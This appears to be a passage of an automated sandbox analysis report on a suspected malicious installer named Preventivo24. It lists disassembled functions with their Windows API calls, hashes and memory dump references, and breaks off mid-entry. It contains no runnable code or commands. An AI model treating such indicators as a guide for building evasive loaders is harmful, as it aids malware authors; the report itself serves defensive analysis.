                                                                              • Instruction ID: a5cd2fba1a24997a3c855e03d14d4b7f7a8459be6207c33fc274ee759dea5ccd
                                                                              • Opcode Fuzzy Hash: a568fecd87f2fce9f8b322cb1c1280d456409a28251e119af5ee5ca8a86f9ee1
                                                                              • Instruction Fuzzy Hash: ECB19B70E00648DFDB14DFA8C958BADBBB5BF49324F148269E425AB381DB74AD46CF40
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000023,?,?,80000002,80000002,011D0080), ref: 0100C800
                                                                              • LoadLibraryW.KERNEL32(Shell32.dll,?,80000002,80000002,011D0080), ref: 0100C813
                                                                              • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0100C823
                                                                              • SHGetPathFromIDListW.SHELL32(?,00000000), ref: 0100C8B2
                                                                              • SHGetMalloc.SHELL32(?), ref: 0100C8FA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AddressFolderFromLibraryListLoadLocationMallocPathProcSpecial
                                                                              • String ID: SHGetSpecialFolderPathW$Shell32.dll
                                                                              • API String ID: 2352187698-2988203397
                                                                              • Opcode ID: 44f3f383cd1aa53e3e351f5a8aa00f320bd3b0a9704df7c1ab23bcd149700c73
                                                                              • Instruction ID: 768303dc70add070299b54ebac3c0dc0228bb8bf1a6bb6dc4d4881e8460909a3
                                                                              • Opcode Fuzzy Hash: 44f3f383cd1aa53e3e351f5a8aa00f320bd3b0a9704df7c1ab23bcd149700c73
                                                                              • Instruction Fuzzy Hash: 23313531A007019BFB2AAF28DD05B27BBF5BF84720F4480ACE9C5872D4EB719589C781
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,0108A282,?,?,?,?), ref: 0108A0FC
                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?), ref: 0108A103
                                                                                • Part of subcall function 0108A1CE: IsProcessorFeaturePresent.KERNEL32(0000000C,0108A0EA,00000000,?,0108A282,?,?,?,?), ref: 0108A1D0
                                                                              • InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,0108A282,?,?,?,?), ref: 0108A113
                                                                              • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,?,?), ref: 0108A13A
                                                                              • RaiseException.KERNEL32(C0000017,00000000,00000000,00000000,?,?,?,?), ref: 0108A14E
                                                                              • InterlockedPopEntrySList.KERNEL32(00000000,?,?,?,?), ref: 0108A161
                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?), ref: 0108A174
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
                                                                              • String ID:
                                                                              • API String ID: 2460949444-0
                                                                              • Opcode ID: aa30a33cac7087921e4a6f8816f70baeca822c5fe0b09ab2bb97cdfb4b8d573a
                                                                              • Instruction ID: 44d7617d1e2df8f7f289ffdde8d8bf14070ac5fb3382d196f3a2773cbba194cf
                                                                              • Opcode Fuzzy Hash: aa30a33cac7087921e4a6f8816f70baeca822c5fe0b09ab2bb97cdfb4b8d573a
                                                                              • Instruction Fuzzy Hash: 95110B31749712EBEB322A685D48F6BBE99AB447C0F040432FAD1D7784DA20CC4187A1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                              • CreateThread.KERNEL32(00000000,00000000,00ECD750,011476F8,00000000,00000000), ref: 00ECD6BC
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00ECD6D5
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00ECD6EB
                                                                              • GetProcessHeap.KERNEL32(?,00000000), ref: 00ECD8C5
                                                                              • HeapFree.KERNEL32(00000000,?,00000000), ref: 00ECD8CB
                                                                              • GetProcessHeap.KERNEL32(?,00000000), ref: 00ECD95C
                                                                              • HeapFree.KERNEL32(00000000,?,00000000), ref: 00ECD962
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$Process$Free$CloseCreateHandleObjectSingleThreadWait
                                                                              • String ID:
                                                                              • API String ID: 3858748702-0
                                                                              • Opcode ID: 0c2f82f01ae634b620f27e21f10e99f27b2b10b720c06a3ff034b205b17c5db0
                                                                              • Instruction ID: 6ca75d3f7b5607ac2ff84f9c840ae2154a1fef4b7faf978e40e6776cfcc12340
                                                                              • Opcode Fuzzy Hash: 0c2f82f01ae634b620f27e21f10e99f27b2b10b720c06a3ff034b205b17c5db0
                                                                              • Instruction Fuzzy Hash: D5027C71D04209DFDB14DFA4C944BAEBBB8BF48314F10416EE815BB291DB765E46CBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,B5580983,00000000), ref: 00FC117B
                                                                              • ReadFile.KERNEL32(00000000,00000000,00001000,?,00000000,00001000), ref: 00FC11ED
                                                                              • ReadFile.KERNEL32(?,00000000,00001000,00000000,00000000,?,?,00000000), ref: 00FC1499
                                                                              • CloseHandle.KERNEL32(?), ref: 00FC14F7
                                                                                • Part of subcall function 00FC1010: LoadStringW.USER32(000000A1,?,00000514,B5580983), ref: 00FC0F68
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: File$Read$CloseCreateHandleHeapLoadProcessString
                                                                              • String ID:
                                                                              • API String ID: 2846944389-0
                                                                              • Opcode ID: a4bed7a08e15b2b18980cabbedad458007b478f1eff2dd910e4473d55472ecab
                                                                              • Instruction ID: f76916613beef6e9aef2a0c934f42bcb425786e0c150dc006b28c4fccb678bf2
                                                                              • Opcode Fuzzy Hash: a4bed7a08e15b2b18980cabbedad458007b478f1eff2dd910e4473d55472ecab
                                                                              • Instruction Fuzzy Hash: F7F1C271E00209DBDB24DFA8CA49BAEBBB5FF46314F24421DE815AB381D7749E44DB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,Caphyon.AI.ExtUI.IEClickSoundRemover,B5580983), ref: 00EA0FA1
                                                                              • GetLastError.KERNEL32 ref: 00EA0FD8
                                                                              • RegCloseKey.ADVAPI32(?,01142730,00000000,01142730,00000000,?,80000001,00000001,00000000,AppEvents\Schemes\Apps\Explorer\Navigating\.Current,00000033), ref: 00EA124E
                                                                              • CloseHandle.KERNEL32(?,B5580983,?,?,00000000,010B67BD,000000FF,?,01142730,00000000,01142730,00000000,?,80000001,00000001,00000000), ref: 00EA12DE
                                                                              Strings
                                                                              • Caphyon.AI.ExtUI.IEClickSoundRemover, xrefs: 00EA0F96
                                                                              • AppEvents\Schemes\Apps\Explorer\Navigating\.Current, xrefs: 00EA1010
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Close$CreateErrorEventHandleLast
                                                                              • String ID: AppEvents\Schemes\Apps\Explorer\Navigating\.Current$Caphyon.AI.ExtUI.IEClickSoundRemover
                                                                              • API String ID: 1253123496-2079760225
                                                                              • Opcode ID: 07b16e19cebcbed4d95d85a040ea6f3eb6078c79b246090b53c30078a358b41a
                                                                              • Instruction ID: cad3825508563a9245341c45acb3fbcc0f8740312aa7bbcc757efe5eb4665773
                                                                              • Opcode Fuzzy Hash: 07b16e19cebcbed4d95d85a040ea6f3eb6078c79b246090b53c30078a358b41a
                                                                              • Instruction Fuzzy Hash: E4C1D070E00249DFDB14DF68C944BAEBBB5FF19304F14829DE459B7680DB74AA84CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SysFreeString.OLEAUT32(?), ref: 00E92CC0
                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00E92D48
                                                                              • GetProcessHeap.KERNEL32(-000000FE,?,?), ref: 00E92DC0
                                                                              • HeapFree.KERNEL32(00000000,-000000FE,?,?), ref: 00E92DC6
                                                                              • GetProcessHeap.KERNEL32(-000000FE,00000000,?,00000000,00000000,00000000,B5580983,?,?,?), ref: 00E92DF3
                                                                              • HeapFree.KERNEL32(00000000,-000000FE,00000000,?,00000000,00000000,00000000,B5580983,?,?,?), ref: 00E92DF9
                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00E92E11
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Free$Heap$String$Process
                                                                              • String ID:
                                                                              • API String ID: 2680101141-0
                                                                              • Opcode ID: 2d09136969b1e306829c2c9e0f1e7bcb28fe13f953eae8a079534c9a87ff44ad
                                                                              • Instruction ID: 80c8f30dec2b20cb4596c86559fd62b1a224cf5c7a4fea629b3657b62b88453f
                                                                              • Opcode Fuzzy Hash: 2d09136969b1e306829c2c9e0f1e7bcb28fe13f953eae8a079534c9a87ff44ad
                                                                              • Instruction Fuzzy Hash: 91916770D01219EFDF21EFA8C844BEEBBB4BF14314F244559E950BB281C7789A04CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • LoadLibraryW.KERNEL32(?,.dll,00000004,?,00000000,01142730,00000000,00000000,00000000), ref: 00E90AB0
                                                                              • GetProcAddress.KERNEL32(00000000,DllGetActivationFactory), ref: 00E90AF9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: .dll$DllGetActivationFactory
                                                                              • API String ID: 2574300362-1250754257
                                                                              • Opcode ID: f8ec583f814e7df26a2481d534c76c54567a847baf8bd31b5ec73f2124957d14
                                                                              • Instruction ID: 934f402dfb3b7edf12f9ed1c9b97159cf1a987761aa195d5ec23fd3f3360d795
                                                                              • Opcode Fuzzy Hash: f8ec583f814e7df26a2481d534c76c54567a847baf8bd31b5ec73f2124957d14
                                                                              • Instruction Fuzzy Hash: 86918B70D10209DFDF19EFA8D8A5BEDFBB1AF54308FA49119E451B7290EBB05A44CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SetLastError.KERNEL32(0000000E,B5580983,?,?,?,00000000,00000000,?), ref: 00E9C4CF
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00E9C513
                                                                              • EnterCriticalSection.KERNEL32(011D536C), ref: 00E9C533
                                                                              • LeaveCriticalSection.KERNEL32(011D536C), ref: 00E9C557
                                                                              • CreateWindowExW.USER32(?,?,00000000,011D536C,?,?,?,?,00000000,?,00000000), ref: 00E9C5B1
                                                                                • Part of subcall function 0108A23A: GetProcessHeap.KERNEL32(00000008,00000008,00000000,00FEBA31,?,?,?), ref: 0108A23F
                                                                                • Part of subcall function 0108A23A: HeapAlloc.KERNEL32(00000000,?,?,?), ref: 0108A246
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalHeapSection$AllocCreateCurrentEnterErrorLastLeaveProcessThreadWindow
                                                                              • String ID: AXWIN UI Window
                                                                              • API String ID: 213679520-1592869507
                                                                              • Opcode ID: e2014016a0d1f59ce21efc2725e4ac5e913b7f2e482ffd28ecfc46a2ea8ceb5c
                                                                              • Instruction ID: b7df1fa3433855da5af56a072dd516493aa22943ca8928ee1e72c8f1191a4b4b
                                                                              • Opcode Fuzzy Hash: e2014016a0d1f59ce21efc2725e4ac5e913b7f2e482ffd28ecfc46a2ea8ceb5c
                                                                              • Instruction Fuzzy Hash: 6751A172604205AFDB24DF69ED05BAAFBF5FB54B14F20812EF914E7280D774A850CB64
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,?,B5580985), ref: 00EA0DD3
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00EA0E30
                                                                                • Part of subcall function 0108AB55: AcquireSRWLockExclusive.KERNEL32(011CE928,?,?,?,00E8B4A6,011CF53C,B5580983,?,?,010B207D,000000FF,?,01003A5D,B5580983,?), ref: 0108AB60
                                                                                • Part of subcall function 0108AB55: ReleaseSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B4A6,011CF53C,B5580983,?,?,010B207D,000000FF,?,01003A5D,B5580983,?), ref: 0108AB9A
                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00EA0E97
                                                                              • CloseHandle.KERNEL32(00000000,?), ref: 00EA0EBD
                                                                                • Part of subcall function 0108AB04: AcquireSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B517,011CF53C,01115440), ref: 0108AB0E
                                                                                • Part of subcall function 0108AB04: ReleaseSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B517,011CF53C,01115440), ref: 0108AB41
                                                                                • Part of subcall function 0108AB04: WakeAllConditionVariable.KERNEL32(011CE924,?,?,00E8B517,011CF53C,01115440), ref: 0108AB4C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ExclusiveLock$AcquireCloseFileHandleRelease$ConditionCreateVariableWakeWrite
                                                                              • String ID: aix$html
                                                                              • API String ID: 3683816281-2369804267
                                                                              • Opcode ID: 5f30b04383bf597a420799fc15761fe09f169b08cfb74161a7525be03ec466d0
                                                                              • Instruction ID: 9e07f3ef7c322110b9300a0ba604b46bef5d90d1755647acd0f302f725c05522
                                                                              • Opcode Fuzzy Hash: 5f30b04383bf597a420799fc15761fe09f169b08cfb74161a7525be03ec466d0
                                                                              • Instruction Fuzzy Hash: 4961C2B0D06244EFDB24DF94D908B9EBBF1BB15708F10451DE011AB280DBF56948CF91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000043A,00000000,00000074), ref: 00EBACE1
                                                                              • lstrcpynW.KERNEL32(?,?,00000020), ref: 00EBAD61
                                                                              • MulDiv.KERNEL32(?,00000048,00000000), ref: 00EBAD9E
                                                                              • SendMessageW.USER32(?,00000444,00000000,00000074), ref: 00EBADD0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$lstrcpyn
                                                                              • String ID: ?$t
                                                                              • API String ID: 3928028829-1995845436
                                                                              • Opcode ID: 694ad3331b11cf0e0d080a532722d460f81f67e1631a8e2bcbfd5d994753dc4f
                                                                              • Instruction ID: 5281cd0dfd252b39e0d797916085ce1f10bc6a1c5803f37f255a83daf33cfc7e
                                                                              • Opcode Fuzzy Hash: 694ad3331b11cf0e0d080a532722d460f81f67e1631a8e2bcbfd5d994753dc4f
                                                                              • Instruction Fuzzy Hash: C2519071609341AFE720DF60D849BDBBBE8FB48304F040929F599D7291DB74E648CB92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • Wow64DisableWow64FsRedirection.KERNEL32(00000000,B5580983,00000000,00000000), ref: 00FBEE7B
                                                                              • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00FBEEF3
                                                                              • GetLastError.KERNEL32 ref: 00FBEF04
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FBEF20
                                                                              • GetExitCodeProcess.KERNEL32(?,000000FF), ref: 00FBEF31
                                                                              • CloseHandle.KERNEL32(?), ref: 00FBEF3B
                                                                              • Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 00FBEF56
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
